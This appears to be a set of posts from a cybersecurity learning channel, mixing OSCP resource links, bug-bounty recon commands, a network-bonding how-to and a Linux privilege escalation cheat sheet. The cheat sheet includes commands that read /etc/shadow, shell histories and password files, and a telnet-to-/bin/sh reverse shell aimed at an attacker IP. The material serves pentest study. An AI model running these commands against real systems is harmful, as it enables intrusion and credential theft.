Freelearningtech

Hey all of you ❤️❤️❤️ We know you are interested in cyber security We have a offer for all of you ❤️❤️❤️❤️If you help poor peoples on This diwali and share pics in our chat group @freelearningtech21 then we will make a videos for you about cyber security and share in our group free of cost❤️❤️❤️❤️ ❤️❤️❤️❤️Don't waste your money on Firecrackers , Make diwali of the same money with the poor peoples❤️❤️❤️❤️ Thanks................... ❤️❤️ Enjoy and Share ❤️❤️ Support Us ❤️ Channel : @freelearningtech Group : @freelearningtech21 Website : https://freelearningtech.in/

OSCP_Helpful_Links.md OSCP Course Review Offensive Security’s PWB and OSCP — My Experience http://www.securitysift.com/offsec-pwb-oscp/ OSCP Journey https://scriptkidd1e.wordpress.com/oscp-journey/ Down with OSCP http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/ Jolly Frogs - Tech Exams (Very thorough) http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html OSCP Inspired VMs and Walkthroughs https://www.hackthebox.eu/ https://www.root-me.org/ https://www.vulnhub.com/ Walk through of Tr0ll-1 - Inspired by on the Trolling found in the OSCP exam https://highon.coffee/blog/tr0ll-1-walkthrough/ Another walk through for Tr0ll-1 https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/ Taming the troll - walkthrough https://leonjza.github.io/blog/2014/08/15/taming-the-troll/ Troll download on Vuln Hub https://www.vulnhub.com/entry/tr0ll-1,100/ Sickos - Walkthrough: https://highon.coffee/blog/sickos-1-walkthrough/ Sickos - Inspired by Labs in OSCP https://www.vulnhub.com/series/sickos,70/ Lord of the Root Walk Through https://highon.coffee/blog/lord-of-the-root-walkthrough/ Lord Of The Root: 1.0.1 - Inspired by OSCP https://www.vulnhub.com/series/lord-of-the-root,67/ Tr0ll-2 Walk Through https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/ Tr0ll-2 https://www.vulnhub.com/entry/tr0ll-2,107/ Cheat Sheets Penetration Tools Cheat Sheet https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/ Pen Testing Bookmarks https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md OSCP Cheatsheets https://github.com/slyth11907/Cheatsheets CEH Cheatsheet https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf Net Bios Scan Cheat Sheet https://highon.coffee/blog/nbtscan-cheat-sheet/ Reverse Shell Cheat Sheet https://highon.coffee/blog/reverse-shell-cheat-sheet/ NMap Cheat Sheet https://highon.coffee/blog/nmap-cheat-sheet/ Linux Commands Cheat Sheet https://highon.coffee/blog/linux-commands-cheat-sheet/ Security Hardening CentO 7 https://highon.coffee/blog/security-harden-centos-7/ MetaSploit Cheatsheet https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf Google Hacking Database: https://www.exploit-db.com/google-hacking-database/ Windows Assembly Language Mega Primer http://www.securitytube.net/groups?operation=view&groupId=6 Linux Assembly Language Mega Primer http://www.securitytube.net/groups?operation=view&groupId=5 Metasploit Cheat Sheet https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf A bit dated but most is still relevant http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html NetCat http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html http://h.ackack.net/cheat-sheets/netcat Essentials Exploit-db https://www.exploit-db.com/ SecurityFocus - Vulnerability database http://www.securityfocus.com/ Vuln Hub - Vulnerable by design https://www.vulnhub.com/ Exploit Exercises https://exploit-exercises.com/ SecLists - collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads https://github.com/danielmiessler/SecLists Security Tube http://www.securitytube.net/ Metasploit Unleashed - free course on how to use Metasploit https://www.offensive-security.com/metasploit-unleashed/ 0Day Security Enumeration Guide http://www.0daysecurity.com/penetration-testing/enumeration.html Github IO Book - Pen Testing Methodology https://monkeysm8.gitbooks.io/pentesting-methodology/

https://github.com/curated-intel/Initial-Access-Broker-Landscape ❤️❤️ Enjoy and Share ❤️❤️ Support Us ❤️ Channel : @freelearningtech Group : @freelearningtech21 Website : https://freelearningtech.in/

https://medium.com/@Bhichher/open-redirect-vulnerability-some-common-payloads-fd1dcd73541c ❤️❤️ Enjoy and Share ❤️❤️ Support Us ❤️ Channel : @freelearningtech Group : @freelearningtech21 Website : https://freelearningtech.in/

https://www.linkedin.com/posts/cybritexsecurity_sarenka-an-osint-tool-that-gets-data-from-activity-6860097313654784000-PvM0 SARENKA - an OSINT tool

https://twitter.com/cybritexsec/status/1454300271178235915?t=qSfX4rEOBagBlsdbiNDgAA&s=19 Unauthenticated Remote Code Execution (RCE) vulnerability in Hikvision IP Camera

Support Us ❤️ Channel : @freelearningtech Group : @freelearningtech21 Website : https://freelearningtech.in/

𝙏𝙝𝙚 𝙇𝙞𝙣𝙪𝙭 𝙋𝙧𝙞𝙫𝙞𝙡𝙚𝙜𝙚 𝙀𝙨𝙘𝙖𝙡𝙖𝙩𝙞𝙤𝙣 𝘾𝙝𝙚𝙖𝙩𝙨𝙝𝙚𝙚𝙩 Operating System What's the distribution type? What version? cat /etc/issue cat /etc/*-release cat /etc/lsb-release What's the kernel version? Is it 64-bit? cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- What can be learnt from the environmental variables? cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set Is there a printer? lpstat -a Applications & Services What services are running? Which service has which user privilege? ps aux ps -ef top cat /etc/services Which service(s) are been running by root? Of these services, which are vulnerable ps aux | grep root ps -ef | grep root What applications are installed? What version are they? Are they currently running? ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/ Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ What jobs are scheduled? crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root Any plain text usernames and/or passwords? grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla Communications & Networking What NIC(s) does the system have? Is it connected to another network? /sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname What other users & hosts are communicating with the system? lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w Whats cached? IP and/or MAC addresses arp -e route /sbin/route -nee Is packet sniffing possible? What can be seen? Listen to live traffic tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21 Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port] Have you got a shell? Can you interact with the system? nc -lvp 4444 # Attacker. Input (Commands) nc -lvp 4445 # Attacker. Ouput (Results) telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP! Confidential Information & Users Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what? id who w last cat /etc/passwd | cut -d: -f1 # List of users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users awk -F: '($3 == "0") {print}' /etc/passwd # List of super users cat /etc/sudoers sudo -l What sensitive files can be found? cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/ Anything "interesting" in the home directorie(s)? If it's possible to access ls -ahlR /root/ ls -ahlR /home/ Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg What has the user being doing? Is there any password in plain text? What have they been edting? cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history What user information can be found? cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root ❤️❤️ Enjoy and Share ❤️❤️ Support Us ❤️ Channel : @freelearningtech Group : @freelearningtech21 Website : https://freelearningtech.in/

https://www.linkedin.com/posts/cybritexsecurity_github-mav8557father-ldpreload-rootkit-activity-6849747757767413760-UewI Father - LD_PRELOAD Rootkit

How to combine two Wifi Connections to get a faster Internet You have more than one active internet connections and you are using only one at a time, while the other is resting? Don't let it be lazy. Combine them all to get combined internet speed. Say you have two connections of 1 Mbps each, you just can make 1+1=2. This can work regardless of the type of the connections, i.e. it may be wired, wireless or mobile communication. Method 1 of 4: Combining LANs Steps: 1. Turn everything on your computer, modems (in case of DSL). 2. Connect them on the relative ports. 3. Establish Connections. Dial or do whatever you need to do to establish an Internet connection and test each one by one separately. If all good proceed to the next step. 4. While each one is active and connected, navigate to the "Network Devices" folder of your computer. It usually stays under control panel. Windows 8 or Windows 8.1, press Windows D to navigate to the desktop, and the rest is the same as windows 7 below. For Windows 7 and Vista, Click the network icon on the task bar-> then click \ Open Network and Sharing Center\ . Then click \ Change Adapter settings\ 5. Review the Connections. Review the window showing all of your network connections. 6. Drag and select. Drag and select Active LAN (Wired, Wireless or DSL Modem) connections. 7. Right click on one of the selected-> click "Bridge Connections." Then wait and a network bridge with different icon will appear. You might have to provide administrative right. *Method 2 of 4: Load Balancing* If you connect 2 internet connection to Windows at a time, the operating system automatically selects one connection as primary and uses others as as failover connection mode. You can force Windows 7, 8 to use both connections simultaneously using a simple trick. Steps: ►Open Network and Sharing Center > Change Adapter Settings ►Go to properties of any of your active Internet connection whether it be LAN, WiFi or 3G/4G. ►Select Internet Protocol TCP/IP Version 4, Open its properties, then go to advanced. ►Uncheck the Automatic Metric and type “15”. ►Repeat same steps on other Internet connections you want to combine. ►Restart your Computer. Method 3 of 4:Using Connectify Hotspot Steps: ►Download the Connectify Dispatch ►Install the Dispatch software. ►Run. Then click "Start Dispatch". ►Connect all your modems or network connections Method 4 of 4: Using Speedify Steps: ►Speedify is a new cloud service from the makers of Connectify, that lets you easily combine multiple WiFi, 3G/4G, and wired networks to create one faster and more reliable Internet connection. ►Visit [www.speedify.com] to begin your free, 3-day trial. Once your trial has started, you will receive an email with your login and a download link for the Speedify client software (for Mac OS X+ & PC) ►Install the Speedify software and then simply enter the email and password that you received from Speedify to log into the Speedify server netwok ►Click the 'Speed Me Up' button to log in. Speedify will automatically connect you to the nearest and fastest Speed Server to ensure that you get the maximum speed and reliability of your Internet connections combined. ►Now, just ensure that you have two or more WiFi, mobile broadband, or wired Internet connections active on your computer, and Speedify does the rest: ►Connect all your modems or network connections. ❤️❤️ Enjoy and Share ❤️❤️ Support Us ❤️ Channel : @freelearningtech Group : @freelearningtech21 Website : https://freelearningtech.in/

Before you read this post first you read our other posts because our all posts are linked with each other. Post 1 - https://t.me/freelearningtech/304 Post 2 - https://t.me/freelearningtech/311 Post 3 - https://t.me/freelearningtech/319 Post 4 - https://t.me/freelearningtech/349 Post 5 -https://t.me/freelearningtech/363 How to find Subdomain Takeover Vulnerability Article Link - https://freelearningtech.in/how-to-find-subdomain-takeover-vulnerability/ Command - ./subzy -targets /home/nikhil/Desktop/yourtarget/worksubdomain.txt | tee -a /home/nikhil/Desktop/yourtarget/subzy.txt (put a path where you can save output) Tool Link - https://github.com/LukaSikic/subzy Alternative Tool Link - https://github.com/m4ll0k/takeover First you Clone this tool then run this command (go build subzy.go) How to take screen shots of your target Subdomains. First you install eyewitness tool Command - Sudo apt-get install eyewitness Comamnd - eyewitness --web -f /home/nikhil/Desktop/yourtarget/worksubdomain.txt -d /home/nikhil/Desktop/yourtarget/eyewitness (put a path where you can save output) Thankyou........... Waiting for our next post ❤️❤️ Enjoy and Share ❤️❤️ Support Us ❤️ Channel : @freelearningtech Group : @freelearningtech21 Website : https://freelearningtech.in/

DETAILS FOR WEBINAR TOPIC : OSINT DATE : 24-10-21 TIME : 12 PM CLASS WILL BE THROUGH : ZOOM LANGUAGE : HINDI CLASS LINK : WE WILL PROVIDE YOU TELEGRAM CHANNEL https://t.me/hackingmaster_t56

Before you read this post first you read our other posts because our all posts are linked with each other. Post 1 - https://t.me/freelearningtech/304 Post 2 - https://t.me/freelearningtech/311 Post 3 - https://t.me/freelearningtech/319 Post 4 - https://t.me/freelearningtech/349 Here we will tell you Github Recon. Github Recon is very helpful in Bug Hunting. Here we will explain about Github Recon. Article Link - https://freelearningtech.in/github-dorking-and-github-recon/ Here we will tell you about githound tool First you save your github username and password in config file like this Config file link - https://github.com/tillson/git-hound/blob/master/config.example.yml # Required github_username: "tillson" github_password: "a8ueifjq4jkasdfoiulk" # Optional github_totp_seed: "ABCDEF1234567890" # Obtained via https://github.com/settings/two_factor_authentication/verify Command - git-hound --workingsubdomain-file /root/Desktop/githubresults.txt (put a path where you can save output) Tool Link - https://github.com/tillson/git-hound Second Tool Link - https://github.com/obheda12/GitDorker If you got any problem for using then leave comment we will help you Waiting for our Next Post Thankyou............ ❤️❤️ Enjoy and Share ❤️❤️ Support Us ❤️ Channel : @freelearningtech Group : @freelearningtech21 Website : https://freelearningtech.in/

Jason Haddix is a Famous Bug Hunter and He Shared our Bug hunting Methodology V4 Article Link - https://freelearningtech.in/jhaddix-bug-bounty-methodology-v4/ ❤️❤️ Enjoy and Share ❤️❤️ Support Us ❤️ Channel : @freelearningtech Group : @freelearningtech21 Website : https://freelearningtech.in/